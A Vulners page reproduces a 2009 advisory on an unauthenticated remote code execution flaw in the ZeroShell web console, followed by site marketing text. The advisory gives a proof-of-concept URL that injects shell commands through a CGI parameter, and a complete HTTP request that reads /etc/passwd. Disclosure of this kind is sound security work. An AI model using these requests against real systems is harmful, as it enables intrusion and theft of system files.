Vulners
Lucene search
ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
====================================================
ZeroShell <= 1.0beta11 Remote Code Execution
Original Advisory:
http://www.ikkisoft.com/stuff/LC-2009-01.txt
luca.carettoni[at]ikkisoft[dot]com
====================================================
ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
for servers and embedded devices. This Linux distro can be configured
and managed with an easy to use web console.
ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this
weakness in order to compromise the entire system.
Authentication is not required in order to exploit this flaw.
[Proof of Concept]
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1